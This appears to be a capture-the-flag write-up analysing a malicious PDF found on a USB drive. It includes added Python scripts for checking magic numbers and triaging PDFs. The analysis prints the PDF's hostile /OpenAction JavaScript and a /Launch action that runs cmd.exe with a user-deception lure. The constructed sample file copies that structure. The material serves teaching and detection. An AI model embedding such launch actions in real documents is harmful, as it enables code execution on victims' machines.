BTLO Challenge: Suspicious USB Stick (Retired Challenge)
- Scenario
- Challenge Submission
- 1. What file is the autorun.inf running? (3 points)
- 2. Does the pdf file pass virustotal scan? (No malicious results returned) (2 points)
- 3. Does the file have the correct magic number? (2 points)
- 4. What OS type can the file exploit? (Linux, MacOS, Windows, etc) (5 points)
- 5. A Windows executable is mentioned in the pdf file, what is it? (3 points)
- 6. How many suspicious /OpenAction elements does the file have? (5 points)
Scenario
One of our clients informed us they recently suffered an employee data breach. As a startup company, they had a constrained budget allocated for security and employee training. I visited them and spoke with the relevant stakeholders. I also collected some suspicious emails and a USB drive an employee found on their premises. While I am analyzing the suspicious emails, can you check the contents on the USB drive?
Reading Material:
https://zeltser.com/analyzing-malicious-documents/
https://en.wikipedia.org/wiki/List_of_file_signatures
https://eternal-todo.com/tools/peepdf-pdf-analysis-tool.
Challenge Submission
1. What file is the autorun.inf running? (3 points)
Format: filename.extension
$ cat autorun.inf
[autorun]
open=README.pdf
icon=autorun.ico
Answer: README.pdf
2. Does the pdf file pass virustotal scan? (No malicious results returned) (2 points)
True or False
SHA256: c868cd6ae39dc3ebbc225c5f8dc86e3b01097aa4b0076eac7960256038e60b43
https://www.virustotal.com/gui/file/c868cd6ae39dc3ebbc225c5f8dc86e3b01097aa4b0076eac7960256038e60b43
VirusTotal detection ratio: 38/59 engines flagged the file as malicious
Answer: False
3. Does the file have the correct magic number? (2 points)
True or False
$ file README.pdf
README.pdf: PDF document, version 1.7
$ hexdump -C README.pdf | head
00000000  25 50 44 46 2d 31 2e 37  0d 0a 25 b5 b5 b5 b5 0d  |%PDF-1.7..%.....|
00000010  0a 31 20 30 20 6f 62 6a  0d 0a 3c 3c 2f 54 79 70  |.1 0 obj..<</Typ|
00000020  65 2f 43 61 74 61 6c 6f  67 2f 50 61 67 65 73 20  |e/Catalog/Pages |
00000030  32 20 30 20 52 2f 4c 61  6e 67 28 65 6e 2d 55 53  |2 0 R/Lang(en-US|
00000040  29 20 2f 53 74 72 75 63  74 54 72 65 65 52 6f 6f  |) /StructTreeRoo|
00000050  74 20 31 30 20 30 20 52  2f 4d 61 72 6b 49 6e 66  |t 10 0 R/MarkInf|
00000060  6f 3c 3c 2f 4d 61 72 6b  65 64 20 74 72 75 65 3e  |o<</Marked true>|
00000070  3e 2f 4d 65 74 61 64 61  74 61 20 32 30 20 30 20  |>/Metadata 20 0 |
00000080  52 2f 56 69 65 77 65 72  50 72 65 66 65 72 65 6e  |R/ViewerPreferen|
00000090  63 65 73 20 32 31 20 30  20 52 3e 3e 0d 0a 65 6e  |ces 21 0 R>>..en|
Answer: True
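The magic-number check behind this question can be automated so that a renamed file (for example a Windows executable carrying a .pdf extension) is flagged rather than trusted on its name. The following is an added example, not code from the write-up or from BTLO; the signature table holds well-known magic numbers, and README_HEAD is constructed from the first hexdump line above.

```python
# Added example (not part of the original write-up): verify that a file's
# leading bytes match the signature its extension promises, the check behind Q3.
# The signature table holds well-known magic numbers; README_HEAD is
# constructed from the first hexdump line shown in the write-up.
from pathlib import Path
from typing import Optional, Tuple

# (magic bytes, format family); several extensions may share one family
MAGICS = [
    (b"%PDF-", "pdf"),
    (b"MZ", "pe"),                       # Windows EXE/DLL (DOS stub header)
    (b"\x89PNG\r\n\x1a\n", "png"),
    (b"PK\x03\x04", "zip"),              # also Office OOXML (docx/xlsx) containers
    (b"GIF87a", "gif"),
    (b"GIF89a", "gif"),
    (b"\x7fELF", "elf"),
]
EXT_FAMILY = {".pdf": "pdf", ".exe": "pe", ".dll": "pe", ".png": "png",
              ".zip": "zip", ".docx": "zip", ".xlsx": "zip", ".gif": "gif"}

# first 16 bytes of README.pdf, taken from the hexdump in the write-up
README_HEAD = bytes.fromhex("255044462d312e370d0a25b5b5b5b50d")


def detect_family(data: bytes) -> Optional[str]:
    """Return the format family whose magic number opens the data, or None."""
    for magic, family in MAGICS:
        if data.startswith(magic):
            return family
    return None


def check_magic(filename: str, data: bytes) -> Tuple[bool, str]:
    """Compare the family the extension promises with the one the bytes show.
    Returns (ok, reason) so a mismatch can be logged instead of silently ignored."""
    ext = Path(filename).suffix.lower()
    expected = EXT_FAMILY.get(ext)
    actual = detect_family(data)
    if expected is None:
        return False, f"no signature rule for extension {ext or '(none)'}"
    if actual is None:
        return False, f"unrecognised header {data[:8].hex() or '(empty file)'}"
    if actual != expected:
        return False, f"extension {ext} expects {expected} but content is {actual}"
    return True, f"{ext} matches {actual}"


if __name__ == "__main__":
    samples = [
        ("README.pdf", README_HEAD),
        ("README.pdf", b"MZ\x90\x00\x03\x00"),   # constructed: an EXE renamed to .pdf
        ("notes.pdf", b""),                      # constructed: empty file
    ]
    for name, head in samples:
        print(name, check_magic(name, head))
```

The check is deliberately strict: it only accepts a signature at offset 0. Adobe readers tolerate up to 1024 bytes of junk before the %PDF- header, so a file this check rejects may still open in a viewer; treat a rejection as "inspect by hand", which is also what `file` and a hexdump give you.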
4. What OS type can the file exploit? (Linux, MacOS, Windows, etc) (5 points)
Operating System
$ pdfinfo README.pdf
Creator: StarMan
CreationDate: Thu Feb 11 02:54:49 2021 EST
ModDate: Thu Feb 11 02:54:49 2021 EST
Tagged: yes
UserProperties: no
Suspects: no
Form: none
Syntax Warning: Bad launch-type link action
JavaScript: no
Pages: 1
Encrypted: no
Page size: 612 x 792 pts (letter)
Page rot: 0
File size: 136561 bytes
Optimized: no
PDF version: 1.7
$ pdfid README.pdf
PDFiD 0.2.7 README.pdf
PDF Header: %PDF-1.7
obj 25
endobj 25
stream 7
endstream 7
xref 4
trailer 4
startxref 4
/Page 2
/Encrypt 0
/ObjStm 1
/JS 1
/JavaScript 1
/AA 1
/OpenAction 1
/AcroForm 0
/JBIG2Decode 0
/RichMedia 0
/Launch 1
/EmbeddedFile 0
/XFA 0
/Colors > 2^24 0
$ pdf-parser -a README.pdf
This program has not been tested with this version of Python (3.9.7)
Should you encounter problems, please use Python version 3.8.7
Comment: 8
XREF: 4
Trailer: 4
StartXref: 4
Indirect object: 24
8: 4, 9, 18, 19, 21, 24, 26, 9
/Action 2: 27, 28
/Catalog 2: 1, 1
/ExtGState 2: 7, 8
/Filespec 1: 25
/Font 1: 5
/FontDescriptor 1: 6
/Metadata 2: 20, 20
/ObjStm 1: 17
/Page 2: 3, 3
/Pages 1: 2
/XRef 1: 22
Search keywords:
/JS 1: 27
/JavaScript 1: 27
/AA 1: 3
/OpenAction 1: 1
/Launch 1: 28
# Check the /JS, /JavaScript, /OpenAction and /Launch objects
$ pdf-parser -o 27 README.pdf
This program has not been tested with this version of Python (3.9.7)
Should you encounter problems, please use Python version 3.8.7
obj 27 0
Type: /Action
Referencing:
<<
/S /JavaScript
/JS (this.exportDataObject({ cName: "README", nLaunch: 0 });)
/Type /Action
>>
$ pdf-parser -o 1 README.pdf
This program has not been tested with this version of Python (3.9.7)
Should you encounter problems, please use Python version 3.8.7
obj 1 0
Type: /Catalog
Referencing: 2 0 R, 10 0 R, 20 0 R, 21 0 R
<<
/Type /Catalog
/Pages 2 0 R
/Lang (en-US)
/StructTreeRoot 10 0 R
/MarkInfo
<<
/Marked true
>>
/Metadata 20 0 R
/ViewerPreferences 21 0 R
>>
obj 1 0
Type: /Catalog
Referencing: 2 0 R, 23 0 R, 27 0 R, 10 0 R, 20 0 R, 21 0 R
<<
/Type /Catalog
/Pages 2 0 R
/Names 23 0 R
/OpenAction 27 0 R
/Lang (en-US)
/StructTreeRoot 10 0 R
/MarkInfo
<<
/Marked true
>>
/Metadata 20 0 R
/ViewerPreferences 21 0 R
>>
$ pdf-parser -o 28 README.pdf
This program has not been tested with this version of Python (3.9.7)
Should you encounter problems, please use Python version 3.8.7
obj 28 0
Type: /Action
Referencing:
<<
/S /Launch
/Type /Action
/Win
<<
/F (cmd.exe)
/D '(c:\\\\windows\\\\system32)'
/P '(/Q /C %HOMEDRIVE%&cd %HOMEPATH%&(if exist "Desktop\\\\README.pdf" (cd "Desktop"))&(if exist "My Documents\\\\README.pdf" (cd "My Documents"))&(if exist "Documents\\\\README.pdf" (cd "Documents"))&(if exist "Escritorio\\\\README.pdf" (cd "Escritorio"))&(if exist "Mis Documentos\\\\README.pdf" (cd "Mis Documentos"))&(start README.pdf)\n\n\n\n\n\n\n\n\n\nTo view the encrypted content please tick the "Do not show this message again" box and press Open.)'
>>
>>
Answer: windows
5. A Windows executable is mentioned in the pdf file, what is it? (3 points)
Format: filename.exe
From the output of $ pdf-parser -o 28 README.pdf above:
Answer: cmd.exe
6. How many suspicious /OpenAction elements does the file have? (5 points)
From the $ pdfid README.pdf output, and from the /OpenAction 27 0 R in obj 1, which runs the suspicious JavaScript.
Answer: 1
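Questions 4 through 6 are all answered by the same triage steps: count the pdfid keywords, follow the catalog's /OpenAction to the action it references, and read the program named by the /Launch action. The script below, an added example that is not part of the write-up and not the code of pdfid or pdf-parser, performs those steps on raw PDF bytes. It also handles the detail visible above where obj 1 appears twice: an incremental update appended a second catalog revision carrying /OpenAction, and the live revision is the last one. SAMPLE_PDF is a constructed file that mirrors that structure; it is not the challenge file.

```python
# Added example, not part of the original write-up or of pdfid/pdf-parser:
# a minimal raw-byte PDF triage in the spirit of Q4-Q6. It counts the
# keywords pdfid reports, resolves every /OpenAction (including ones added
# by an incremental update, which is why obj 1 appears twice in the write-up)
# and extracts the program named by any /Launch action.
import re
from collections import defaultdict
from typing import Dict, List, Optional

KEYWORDS = [b"/JS", b"/JavaScript", b"/AA", b"/OpenAction", b"/Launch",
            b"/EmbeddedFile", b"/ObjStm", b"/AcroForm", b"/XFA"]
OBJ_RE = re.compile(rb"(\d+)\s+(\d+)\s+obj\b(.*?)endobj", re.DOTALL)

# Constructed sample (not the challenge file) mirroring the structure in the
# write-up: the original catalog (obj 1) is superseded by an incremental update
# that adds /OpenAction 27 0 R; obj 27 runs JavaScript, obj 28 is /Launch.
SAMPLE_PDF = rb"""%PDF-1.7
1 0 obj
<</Type /Catalog /Pages 2 0 R /StructTreeRoot 10 0 R>>
endobj
2 0 obj
<</Type /Pages /Kids [3 0 R] /Count 1>>
endobj
3 0 obj
<</Type /Page /Parent 2 0 R /AA <</O 27 0 R>>>>
endobj
1 0 obj
<</Type /Catalog /Pages 2 0 R /Names 23 0 R /OpenAction 27 0 R /StructTreeRoot 10 0 R>>
endobj
27 0 obj
<</Type /Action /S /JavaScript /JS (this.exportDataObject({ cName: "README", nLaunch: 0 });)>>
endobj
28 0 obj
<</Type /Action /S /Launch /Win <</F (cmd.exe) /D (c:\\windows\\system32) /P (/Q /C start README.pdf)>>>>
endobj
trailer
<</Root 1 0 R>>
%%EOF
"""


def count_keywords(data: bytes) -> Dict[str, int]:
    """pdfid-style counts; a PDF name ends at whitespace or a delimiter, so
    /JS must not match the start of a longer name."""
    return {kw.decode(): len(re.findall(re.escape(kw) + rb"(?![A-Za-z0-9_])", data))
            for kw in KEYWORDS}


def parse_objects(data: bytes) -> Dict[int, List[bytes]]:
    """Object number -> every revision of its body, in file order.
    Incremental updates append a new revision; the last one is live."""
    objs: Dict[int, List[bytes]] = defaultdict(list)
    for m in OBJ_RE.finditer(data):
        objs[int(m.group(1))].append(m.group(3).strip())
    return objs


def read_literal(body: bytes, start: int) -> bytes:
    """Read the PDF literal string whose '(' is at body[start], honouring
    balanced nested parentheses and backslash escapes (the JS payload above
    contains its own parentheses, so a naive regex would cut it short)."""
    depth, i, out = 0, start, bytearray()
    while i < len(body):
        c = body[i:i + 1]
        if c == b"\\":            # escaped character: keep the next byte verbatim
            out += body[i + 1:i + 2]
            i += 2
            continue
        if c == b"(":
            depth += 1
            if depth > 1:
                out += c
        elif c == b")":
            depth -= 1
            if depth == 0:
                return bytes(out)
            out += c
        else:
            out += c
        i += 1
    return bytes(out)             # unterminated string: return what was read


def string_value(body: bytes, key: bytes) -> Optional[str]:
    """Value of /key when it is a literal string, e.g. /JS (...) or /F (...)."""
    m = re.search(re.escape(key) + rb"(?![A-Za-z0-9_])\s*", body)
    if not m or body[m.end():m.end() + 1] != b"(":
        return None
    return read_literal(body, m.end()).decode("latin-1")


def action_type(body: bytes) -> Optional[str]:
    """The /S subtype of an action dictionary (JavaScript, Launch, URI, ...)."""
    m = re.search(rb"/S\s*/([A-Za-z]+)", body)
    return m.group(1).decode() if m else None


def open_actions(data: bytes) -> List[dict]:
    """Every /OpenAction reference in every catalog revision, resolved to the
    live revision of the action object it points at."""
    objs = parse_objects(data)
    found = []
    for num, revisions in objs.items():
        for body in revisions:
            m = re.search(rb"/OpenAction\s+(\d+)\s+\d+\s+R", body)
            if not m:
                continue
            target = int(m.group(1))
            action = objs[target][-1] if objs.get(target) else b""
            found.append({"catalog": num, "target": target,
                          "type": action_type(action),
                          "js": string_value(action, b"/JS"),
                          "launch": string_value(action, b"/F")})
    return found


def launch_targets(data: bytes) -> List[tuple]:
    """(object number, /F program) for every /Launch action revision."""
    return [(num, string_value(body, b"/F"))
            for num, revisions in parse_objects(data).items()
            for body in revisions if action_type(body) == "Launch"]


if __name__ == "__main__":
    print(count_keywords(SAMPLE_PDF))
    for oa in open_actions(SAMPLE_PDF):
        print("catalog obj", oa["catalog"], "-> /OpenAction obj", oa["target"],
              oa["type"], oa["js"])
    print("Launch targets:", launch_targets(SAMPLE_PDF))
```

Like pdfid, this scans the raw bytes only: objects packed into a compressed /ObjStm (the write-up's file has one, holding objects 4, 9, 18 and others) are invisible until the stream is inflated, which is what `pdf-parser -O` does. For triage, a file whose only /OpenAction points at a JavaScript action that in turn hands off to a /Launch of cmd.exe is enough to escalate regardless of what the compressed objects contain.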